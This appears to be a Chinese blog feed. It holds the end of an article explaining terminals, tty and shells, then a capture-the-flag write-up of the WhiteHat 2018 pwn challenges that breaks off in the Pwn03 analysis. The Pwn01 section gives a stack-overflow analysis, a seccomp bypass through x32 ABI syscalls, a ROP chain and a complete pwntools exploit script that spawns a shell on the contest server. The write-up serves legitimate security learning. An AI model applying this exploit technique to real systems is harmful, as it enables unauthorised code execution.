<code>Ctrl + Alt + F1...F6</code> 等快捷键可以切换到<strong>虚拟控制台（Virtual Console）</strong>，快捷键 <code>Ctrl + Alt + F7</code> 切换回 GUI，虽然 Virtual Console 不运行在 GUI 中，但他们实质上也是一种终端模拟器（下图为正在现实系统启动信息的 Virtual Console）。 <img src="https://upload.wikimedia.org/wikipedia/commons/1/10/KNOPPIX_booting.png" alt=""></p> <p>Terminal Window 与 Virtual Console 的区别是 Virutal Console 是直接由操作系统内核（OS kernel）提供的，因此当图形界面 down 了时，往往还可以到 virtual console 抢救，因为他们是由 kernel 直接提供的，只要系统不出问题一般都还是可以用的</p> <h2 id="那么什么是-tty-">那么，什么是 TTY ？</h2> <p>先给结论，tty 就是终端的统称。</p> <p>从上边的历史我们知道电传打字机（Teletype）是最早的终端，tty 即为 Teletype 的缩写。由于 *nix 是多用户的操作系统，所以一台计算机会有多个终端连接。在早期，为了支持这些连接的电传打字机，开发者设计了名为 tty 的子系统（因为所有终端都是 tty，因此这个子系统也被命名为了 tty）。</p> <p>同时因为 *nix 系统的哲学之一 —— <strong>Everything is a file</strong>，具体的硬件设备也被抽象为了 <strong>/dev/tty?</strong> 等文件 <img src="http://ww1.sinaimg.cn/large/006AWYXBly1fv4xrbniooj30y109i762.jpg" alt=""></p> <p><em>上边说的 <code>ctrl + alt + F1-6</code> 等 virtual console 分别对应了图中的 <code>/dev/tty1-6</code></em></p> <p>虽然现在终端设备已经不再限制于 teletype，但 tty 这个名称还是被保留了下来，所以在现代，tty 就可以理解成终端设备，终端设备即为 tty 。</p> <blockquote> <p>后来，在 tty 子系统中衍生出了 pty，ptmx，pts 等概念，这些概念留到第三篇</p> </blockquote> <h2 id="什么是-shell">什么是 shell</h2> <p>先看这张图，shell 位于最外层，像一层壳（shell）一样供用户与 kernel 沟通，让 kernel 完成用户交于的任务 <img src="https://img.blessing.studio/images/2018/08/23/computer_system.png" alt=""></p> <blockquote> <p>实际上 shell 知识提供了用户操作系统的入口，一般是通过 shell 去调用其他的应用程序来达成目的。</p> <p>如我们运行 <code>cat test</code> 时，shell 会运行 <code>cat</code> 这个程序，cat 再去调用内核提供的 open，read，write 等系统调用，虽然 shell 并没有直接与内核进行交互，但广义上我们可以认为 shell 提供了用户与内核交互的界面</p> </blockquote> <p>shell 可以分为命令行 shell 和图形 shell 两类。命令行 shell 提供 CLI 界面，图形 shell 提供 GUI 界面（如 windows 的 explorer.exe，接受用户的指令，与内核完成交互）</p> <p>常用的命令行 shell 有：</p> <ul> <li>*nix: <ul> <li>sh(Bourne shell)，最经典的 shell</li> <li>bash(Bourne-Again shell)，绝大多数 linux 发行版的默认 shell</li> <li>zsh，fish 等专注于用户友好体验的 shell</li> </ul> </li> <li>Windows 下的 cmd.exe 与 powershell</li> </ul> <h2 id="shell-与终端的分工">shell 与终端的分工</h2> <p>总结一下:</p> <ul> <li>终端从用户接受输入（通过键盘，鼠标等输入设备），把输入交给 shell，然后把 shell 返回的结果通过显示器等方法展示给用户。</li> <li>shell 从终端接受用户的输入，解析后交给操作系统内核进行处理，并把结果返回给终端</li> </ul> <h2 id="references">References:</h2> <p><a href="https://superuser.com/questions/144666/what-is-the-difference-between-shell-console-and-terminal">https://superuser.com/questions/144666/what-is-the-difference-between-shell-console-and-terminal</a></p> <p><a href="https://www.zhihu.com/question/65280843">https://www.zhihu.com/question/65280843</a></p> <p><a href="https://blessing.studio/the-difference-between-cli-terminal-shell-tty/">https://blessing.studio/the-difference-between-cli-terminal-shell-tty/</a></p> <p><a href="https://stackoverflow.com/questions/21014344/terminal-or-console-or-shell-or-command-prompt">https://stackoverflow.com/questions/21014344/terminal-or-console-or-shell-or-command-prompt</a></p> <p><a href="https://zh.wikipedia.org/wiki/">https://zh.wikipedia.org/wiki/</a>終端</p> <p><a href="https://en.wikipedia.org/wiki/Terminal_emulator">https://en.wikipedia.org/wiki/Terminal_emulator</a></p> https://bash-c.github.io/post/whitehat2018-pwn-writeup/ Sat, 25 Aug 2018 20:19:16 +0800 https://bash-c.github.io/post/whitehat2018-pwn-writeup/ <p>越南的一场<a href="https://ctftime.org/event/656">比赛</a>, 比赛当天陪女朋友理发, 在理发店看了 pwn01, 刚有思路, 电脑没电了, 第二天接着做时发现比赛结束了. 比赛结束后参考 <a href="https://ctftime.org/event/656/tasks/">writeup</a> 复现了三道 pwn, 收获不少, 这里记录一下.</p> <h2 id="pwn01">Pwn01</h2> <p><a href="https://github.com/0x01f/pwn_repo/tree/master/WhiteHat2018_pwn01">题目链接</a></p> <h3 id="题目分析">题目分析</h3> <p>附件给了很多文件, 根据 run.sh 和 ptrace_64.cpp 大概看出程序禁用了 poll, clone, fork, vfork, <strong>execve</strong>, kill, tkill, tgkill 和 write 等系统调用以及过滤了 /home/gift/flag.txt 字符串. 禁用了 execve 说明无论使用 system 还是 one_gadget 都不能 get shell, 过滤了 /home/gift/flag.txt 防止使用 orw 的方法直接读取 flag, 当然这两点都是可以绕过的</p> <p>再回过头看 giftshop, 程序没有开启 canary 保护(checksec 可能会有误报, 最准确的方法是查看 __stack_chk_fail 附近的汇编). 经过分析, 程序中存在如下的结构体</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">WhiteHat2018_pwn01 <span class="o">[</span>master●●<span class="o">]</span> cat struct struct GOOD <span class="o">{</span> char name<span class="o">[</span>30<span class="o">]</span><span class="p">;</span> char receiver<span class="o">[</span>34<span class="o">]</span><span class="p">;</span> char *item<span class="p">;</span> char *address<span class="p">;</span> char *a_letter<span class="p">;</span> unsigned int price<span class="p">;</span> <span class="o">}</span> </code></pre></td></tr></table> </div> </div><p>用 IDA 观察程序流程, 发现程序刚进入时就打印了一个全局变量的地址, 这样 PIE 保护也被绕过了</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"> <span class="n">puts</span><span class="p">(</span><span class="s">&#34;OK First, here is a giftcard, it may help you in next time you come here !&#34;</span><span class="p">);</span> <span class="n">printf</span><span class="p">(</span><span class="s">&#34;%p</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">loyal_flag</span><span class="p">);</span> <span class="c1">// bypass PIE </span></code></pre></td></tr></table> </div> </div><p>继续分析, 程序有 order, show_order, delete_order, loyal 等四个功能, 而查看 order 功能时, 就发现了明显的栈溢出以及栈溢出引起的数组越界的漏洞</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"> <span class="k">else</span> <span class="p">{</span> <span class="n">setbuf</span><span class="p">(</span><span class="n">stdin</span><span class="p">,</span> <span class="mi">0LL</span><span class="p">);</span> <span class="n">puts</span><span class="p">(</span><span class="s">&#34;Enter your address: &#34;</span><span class="p">);</span> <span class="n">fgets</span><span class="p">(</span><span class="n">good_list</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">address</span><span class="p">,</span> <span class="mh">0x200</span><span class="p">,</span> <span class="n">stdin</span><span class="p">);</span> <span class="n">setbuf</span><span class="p">(</span><span class="n">stdin</span><span class="p">,</span> <span class="mi">0LL</span><span class="p">);</span> <span class="n">puts</span><span class="p">(</span><span class="s">&#34;A letter for her/him:&#34;</span><span class="p">);</span> <span class="n">filter</span><span class="p">(</span><span class="n">s</span><span class="p">);</span> <span class="n">fgets</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="mi">230</span><span class="p">,</span> <span class="n">stdin</span><span class="p">);</span> <span class="c1">// bof bug </span><span class="c1"></span> <span class="n">setbuf</span><span class="p">(</span><span class="n">stdin</span><span class="p">,</span> <span class="mi">0LL</span><span class="p">);</span> <span class="n">good_list</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">a_letter</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="n">malloc</span><span class="p">(</span><span class="mh">0x1EuLL</span><span class="p">);</span> <span class="n">strncpy</span><span class="p">(</span><span class="n">good_list</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">a_letter</span><span class="p">,</span> <span class="n">s</span><span class="p">,</span> <span class="mh">0x1EuLL</span><span class="p">);</span> <span class="p">}</span> </code></pre></td></tr></table> </div> </div><h3 id="漏洞利用">漏洞利用</h3> <h4 id="step-1">Step 1:</h4> <p>看一下栈的布局发现能完整的覆盖到 order 的 rbp 以及返回地址, 溢出的长度不足以构造长的 ropchain, 考虑使用 stack-pivot 将栈转移到 bss 段(绕过了 PIE 保护, bss 段的地址相当于是已知的), 构造以下的栈结构</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-fallback" data-lang="fallback">+-----------------+ | | |padding | | | +-----------------+ |elf.bss() + 0x500| &lt;- rbp +-----------------+ |fgets_gadgets | &lt;- ret addr +-----------------+ </code></pre></td></tr></table> </div> </div><p>其中, fgets_gedgets 为</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-fallback" data-lang="fallback">.text:00000000000018B9 mov rdx, cs:stdin ; stream .text:00000000000018C0 lea rax, [rbp+s] .text:00000000000018C7 mov esi, 0E6h ; n .text:00000000000018CC mov rdi, rax ; s .text:00000000000018CF call _fgets </code></pre></td></tr></table> </div> </div><p>覆盖返回地址为 elf.address + 0x18B9 时, order 函数将返回到这里, 从 stdin 读取最多 0xE6 个数据并保存到 rbp+s 即 rbp - 0xD0 的位置, 上图的栈结构中, 即会把输入保存到 elf.bss() + 0x500 - 0xD0 上; (不建议使用 bss 开头的地址, 因为 bss 的开头存储了stdin, stdout, stderr 等重要 IO_file 结构体, 随意覆盖可能会在 io 上出现问题)</p> <p>同时需要注意的是需要给 i 一个合理的值, 否则在执行</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"> <span class="n">good_list</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">a_letter</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="n">malloc</span><span class="p">(</span><span class="mh">0x1EuLL</span><span class="p">);</span> </code></pre></td></tr></table> </div> </div><p>一句时将会因为地址不可写程序发生 crash</p> <h4 id="step-2">Step 2:</h4> <p>这样通过一次 rop, 我们就能在 bss 段这一个固定的地址上构造一段相对较长的利用链. <strong>关键是要构造什么样的利用链</strong>, 程序已经过滤了 execve 这个系统调用, 用常规方法就不能 get shell 了, 但实际上这个过滤还是很弱的, 我们有很多方法可以利用, 比如使用 <a href="https://github.com/Naetw/CTF-pwn-tips#use-execveat-to-open-a-shell">execveat</a> 或者使用 x32 abi 这个特性</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-fallback" data-lang="fallback">Since 3.4 the Linux kernel has had a feature called the X32 ABI; 64bit syscalls with 32bit pointers. &#39;&#39;&#39; WhiteHat2018_pwn01 [master●●] grep -i execve /usr/include/asm/unistd_x32.h #define __NR_execve (__X32_SYSCALL_BIT + 520) #define __NR_execveat (__X32_SYSCALL_BIT + 545) &#39;&#39;&#39; </code></pre></td></tr></table> </div> </div><p>简单的说, 就是可以用 0x40000000 加上一个系统调用号的方式进行系统调用, 比如使用 0x40000000 + 520 的方式实现 execve 这个系统调用, 这样就实现了绕过黑名单, 因此可以构造如下的 ropchain 来 get shell</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-python" data-lang="python"> <span class="n">prdi</span> <span class="o">=</span> <span class="mh">0x000000000000225f</span> <span class="o">+</span> <span class="n">elf</span><span class="o">.</span><span class="n">address</span> <span class="n">prsi</span> <span class="o">=</span> <span class="mh">0x0000000000002261</span> <span class="o">+</span> <span class="n">elf</span><span class="o">.</span><span class="n">address</span> <span class="n">prdx</span> <span class="o">=</span> <span class="mh">0x0000000000002265</span> <span class="o">+</span> <span class="n">elf</span><span class="o">.</span><span class="n">address</span> <span class="n">prax</span> <span class="o">=</span> <span class="mh">0x0000000000002267</span> <span class="o">+</span> <span class="n">elf</span><span class="o">.</span><span class="n">address</span> <span class="n">syscall</span> <span class="o">=</span> <span class="mh">0x0000000000002254</span> <span class="o">+</span> <span class="n">elf</span><span class="o">.</span><span class="n">address</span> <span class="n">binsh</span> <span class="o">=</span> <span class="n">elf</span><span class="o">.</span><span class="n">bss</span><span class="p">()</span> <span class="o">+</span> <span class="mh">0x500</span> <span class="o">-</span> <span class="mh">0xd0</span> <span class="n">rop</span> <span class="o">=</span> <span class="n">flat</span><span class="p">([</span><span class="s2">&#34;/bin/sh</span><span class="se">\0</span><span class="s2">&#34;</span><span class="p">,</span> <span class="n">prax</span><span class="p">,</span> <span class="mh">0x40000000</span> <span class="o">+</span> <span class="mi">520</span><span class="p">,</span> <span class="n">prdi</span><span class="p">,</span> <span class="n">binsh</span><span class="p">,</span> <span class="n">prsi</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">prdx</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">syscall</span><span class="p">])</span> <span class="c1"># 刚开始还很奇怪这个程序中有这么多好用的 gadget, 后来看了别人 writeup 才知道这是出题方故意加进去的- -</span> </code></pre></td></tr></table> </div> </div><h4 id="step-3">Step 3:</h4> <p>那么这时候就只差一步了: 控制 rip 到我们构造的 ropchian 就能拿到 shell 了, 这一步不难做到, 第二次 fgets 时, 输入从 rbp - 0xE0 开始, 我们依然能控制 rbp, 并且程序中也可以找到 <code>leave; ret</code> 这个 gadget, 这样再进行一次栈迁移, 控制返回地址为我们输入的 ropchain 的位置即可</p> <h3 id="exp">exp</h3> <p>最终的 exp 如下:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span><span class="lnt">66 </span><span class="lnt">67 </span><span class="lnt">68 </span><span class="lnt">69 </span><span class="lnt">70 </span><span class="lnt">71 </span><span class="lnt">72 </span><span class="lnt">73 </span><span class="lnt">74 </span><span class="lnt">75 </span><span class="lnt">76 </span><span class="lnt">77 </span><span class="lnt">78 </span><span class="lnt">79 </span><span class="lnt">80 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-python" data-lang="python"><span class="n">WhiteHat2018_pwn01</span> <span class="p">[</span><span class="n">master</span><span class="err">●●</span><span class="p">]</span> <span class="n">cat</span> <span class="n">exp</span><span class="o">.</span><span class="n">py</span> <span class="c1">#!/usr/bin/env python</span> <span class="c1"># -*- coding: utf-8 -*-</span> <span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="kn">from</span> <span class="nn">time</span> <span class="kn">import</span> <span class="n">sleep</span> <span class="kn">import</span> <span class="nn">roputils</span> <span class="kn">as</span> <span class="nn">rp</span> <span class="kn">from</span> <span class="nn">ctypes</span> <span class="kn">import</span> <span class="n">c_uint64</span> <span class="kn">import</span> <span class="nn">os</span> <span class="kn">import</span> <span class="nn">sys</span> <span class="n">elfPath</span> <span class="o">=</span> <span class="s2">&#34;./giftshop&#34;</span> <span class="n">libcPath</span> <span class="o">=</span> <span class="s2">&#34;&#34;</span> <span class="n">remoteAddr</span> <span class="o">=</span> <span class="s2">&#34;pwn01.grandprix.whitehatvn.com&#34;</span> <span class="n">remotePort</span> <span class="o">=</span> <span class="mi">26129</span> <span class="n">context</span><span class="o">.</span><span class="n">binary</span> <span class="o">=</span> <span class="n">elfPath</span> <span class="n">elf</span> <span class="o">=</span> <span class="n">context</span><span class="o">.</span><span class="n">binary</span> <span class="k">if</span> <span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">==</span> <span class="s2">&#34;l&#34;</span><span class="p">:</span> <span class="n">io</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="n">elfPath</span><span class="p">)</span> <span class="n">libc</span> <span class="o">=</span> <span class="n">elf</span><span class="o">.</span><span class="n">libc</span> <span class="k">else</span><span class="p">:</span> <span class="k">if</span> <span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">==</span> <span class="s2">&#34;d&#34;</span><span class="p">:</span> <span class="n">io</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="n">elfPath</span><span class="p">,</span> <span class="n">env</span> <span class="o">=</span> <span class="p">{</span><span class="s2">&#34;LD_PRELOAD&#34;</span><span class="p">:</span> <span class="n">libcPath</span><span class="p">})</span> <span class="k">else</span><span class="p">:</span> <span class="n">io</span> <span class="o">=</span> <span class="n">remote</span><span class="p">(</span><span class="n">remoteAddr</span><span class="p">,</span> <span class="n">remotePort</span><span class="p">)</span> <span class="n">context</span><span class="o">.</span><span class="n">log_level</span> <span class="o">=</span> <span class="s2">&#34;info&#34;</span> <span class="k">if</span> <span class="n">libcPath</span><span class="p">:</span> <span class="n">libc</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="n">libcPath</span><span class="p">)</span> <span class="n">context</span><span class="o">.</span><span class="n">log_level</span> <span class="o">=</span> <span class="s2">&#34;debug&#34;</span> <span class="n">context</span><span class="o">.</span><span class="n">terminal</span> <span class="o">=</span> <span class="p">[</span><span class="s2">&#34;deepin-terminal&#34;</span><span class="p">,</span> <span class="s2">&#34;-x&#34;</span><span class="p">,</span> <span class="s2">&#34;sh&#34;</span><span class="p">,</span> <span class="s2">&#34;-c&#34;</span><span class="p">]</span> <span class="n">success</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">name</span><span class="p">,</span> <span class="n">value</span><span class="p">:</span> <span class="n">log</span><span class="o">.</span><span class="n">success</span><span class="p">(</span><span class="s2">&#34;{} -&gt; {:#x}&#34;</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">name</span><span class="p">,</span> <span class="n">value</span><span class="p">))</span> <span class="k">def</span> <span class="nf">DEBUG</span><span class="p">(</span><span class="n">bps</span> <span class="o">=</span> <span class="p">[]):</span> <span class="n">cmd</span> <span class="o">=</span> <span class="s2">&#34;set follow-fork-mode parent</span><span class="se">\n</span><span class="s2">&#34;</span> <span class="n">base</span> <span class="o">=</span> <span class="n">elf</span><span class="o">.</span><span class="n">address</span> <span class="n">cmd</span> <span class="o">+=</span> <span class="s1">&#39;&#39;</span><span class="o">.</span><span class="n">join</span><span class="p">([</span><span class="s1">&#39;b *{:#x}</span><span class="se">\n</span><span class="s1">&#39;</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">b</span> <span class="o">+</span> <span class="n">base</span><span class="p">)</span> <span class="k">for</span> <span class="n">b</span> <span class="ow">in</span> <span class="n">bps</span><span class="p">])</span> <span class="n">cmd</span> <span class="o">+=</span> <span class="s2">&#34;c&#34;</span> <span class="nb">raw_input</span><span class="p">(</span><span class="s2">&#34;DEBUG: &#34;</span><span class="p">)</span> <span class="n">gdb</span><span class="o">.</span><span class="n">attach</span><span class="p">(</span><span class="n">io</span><span class="p">,</span> <span class="n">cmd</span><span class="p">)</span> <span class="k">def</span> <span class="nf">bof</span><span class="p">(</span><span class="n">letter</span><span class="p">):</span> <span class="k">assert</span> <span class="nb">len</span><span class="p">(</span><span class="n">letter</span><span class="p">)</span> <span class="o">&lt;</span> <span class="mi">240</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;:</span><span class="se">\n</span><span class="s2">&#34;</span><span class="p">,</span> <span class="s2">&#34;1&#34;</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;y/n</span><span class="se">\n</span><span class="s2">&#34;</span><span class="p">,</span> <span class="s2">&#34;n&#34;</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;txt</span><span class="se">\n</span><span class="s2">&#34;</span><span class="p">,</span> <span class="s2">&#34;1&#34;</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="s2">&#34;6&#34;</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;y/n</span><span class="se">\n</span><span class="s2">&#34;</span><span class="p">,</span> <span class="s2">&#34;y&#34;</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;: </span><span class="se">\n</span><span class="s2">&#34;</span><span class="p">,</span> <span class="s2">&#34;address&#34;</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;:</span><span class="se">\n</span><span class="s2">&#34;</span><span class="p">,</span> <span class="n">letter</span><span class="p">)</span> <span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s2">&#34;__main__&#34;</span><span class="p">:</span> <span class="n">io</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s2">&#34; !</span><span class="se">\n</span><span class="s2">&#34;</span><span class="p">)</span> <span class="n">elf</span><span class="o">.</span><span class="n">address</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">io</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s2">&#34;</span><span class="se">\n</span><span class="s2">&#34;</span><span class="p">,</span> <span class="n">drop</span> <span class="o">=</span> <span class="bp">True</span><span class="p">),</span> <span class="mi">16</span><span class="p">)</span> <span class="o">-</span> <span class="mh">0x2030D8</span> <span class="n">success</span><span class="p">(</span><span class="s2">&#34;elf&#34;</span><span class="p">,</span> <span class="n">elf</span><span class="o">.</span><span class="n">address</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;??</span><span class="se">\n</span><span class="s2">&#34;</span><span class="p">,</span> <span class="s2">&#34;0000&#34;</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;: </span><span class="se">\n</span><span class="s2">&#34;</span><span class="p">,</span> <span class="s2">&#34;1111&#34;</span><span class="p">)</span> <span class="c1"># DEBUG([0x19BC])</span> <span class="n">fgets_gadgets</span> <span class="o">=</span> <span class="mh">0x18B9</span> <span class="o">+</span> <span class="n">elf</span><span class="o">.</span><span class="n">address</span> <span class="n">bof</span><span class="p">(</span><span class="n">flat</span><span class="p">([</span><span class="s1">&#39;</span><span class="se">\0</span><span class="s1">&#39;</span> <span class="o">*</span> <span class="mh">0xd0</span><span class="p">,</span> <span class="n">elf</span><span class="o">.</span><span class="n">bss</span><span class="p">()</span> <span class="o">+</span> <span class="mh">0x500</span><span class="p">,</span> <span class="n">fgets_gadgets</span><span class="p">]))</span> <span class="n">leaveret</span> <span class="o">=</span> <span class="mh">0x0000000000001176</span> <span class="o">+</span> <span class="n">elf</span><span class="o">.</span><span class="n">address</span> <span class="n">prdi</span> <span class="o">=</span> <span class="mh">0x000000000000225f</span> <span class="o">+</span> <span class="n">elf</span><span class="o">.</span><span class="n">address</span> <span class="n">prsi</span> <span class="o">=</span> <span class="mh">0x0000000000002261</span> <span class="o">+</span> <span class="n">elf</span><span class="o">.</span><span class="n">address</span> <span class="n">prdx</span> <span class="o">=</span> <span class="mh">0x0000000000002265</span> <span class="o">+</span> <span class="n">elf</span><span class="o">.</span><span class="n">address</span> <span class="n">prax</span> <span class="o">=</span> <span class="mh">0x0000000000002267</span> <span class="o">+</span> <span class="n">elf</span><span class="o">.</span><span class="n">address</span> <span class="n">syscall</span> <span class="o">=</span> <span class="mh">0x0000000000002254</span> <span class="o">+</span> <span class="n">elf</span><span class="o">.</span><span class="n">address</span> <span class="n">binsh</span> <span class="o">=</span> <span class="n">elf</span><span class="o">.</span><span class="n">bss</span><span class="p">()</span> <span class="o">+</span> <span class="mh">0x500</span> <span class="o">-</span> <span class="mh">0xd0</span> <span class="n">rop</span> <span class="o">=</span> <span class="n">flat</span><span class="p">([</span><span class="s2">&#34;/bin/sh</span><span class="se">\0</span><span class="s2">&#34;</span><span class="p">,</span> <span class="n">prax</span><span class="p">,</span> <span class="mh">0x40000000</span> <span class="o">+</span> <span class="mi">520</span><span class="p">,</span> <span class="n">prdi</span><span class="p">,</span> <span class="n">binsh</span><span class="p">,</span> <span class="n">prsi</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">prdx</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">syscall</span><span class="p">])</span> <span class="n">payload</span> <span class="o">=</span> <span class="n">rop</span><span class="o">.</span><span class="n">ljust</span><span class="p">(</span><span class="mh">0xd0</span><span class="p">,</span> <span class="s1">&#39;</span><span class="se">\0</span><span class="s1">&#39;</span><span class="p">)</span> <span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">elf</span><span class="o">.</span><span class="n">bss</span><span class="p">()</span> <span class="o">+</span> <span class="mh">0x500</span> <span class="o">-</span> <span class="mh">0xd0</span><span class="p">)</span> <span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">leaveret</span><span class="p">)</span> <span class="k">assert</span> <span class="nb">len</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span> <span class="o">&lt;</span> <span class="mi">240</span> <span class="n">io</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">interactive</span><span class="p">()</span> </code></pre></td></tr></table> </div> </div><h2 id="pwn02">Pwn02</h2> <p>tcache uaf off-by-one null</p> <h2 id="pwn03">Pwn03</h2> <p>这道题挺有意思, 程序给了一个二进制文件和共享库, <a href="https://github.com/0x01f/pwn_repo/tree/master/WhiteHat2018_pwn03">下载文件</a></p> <h3 id="题目分析-1">题目分析</h3> <p>程序开启了所有保护, 并且有意思的是给的 libc 也是 patch 过得, 找一下 BuildID 相同的 libc, 查看 patch 的内容</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 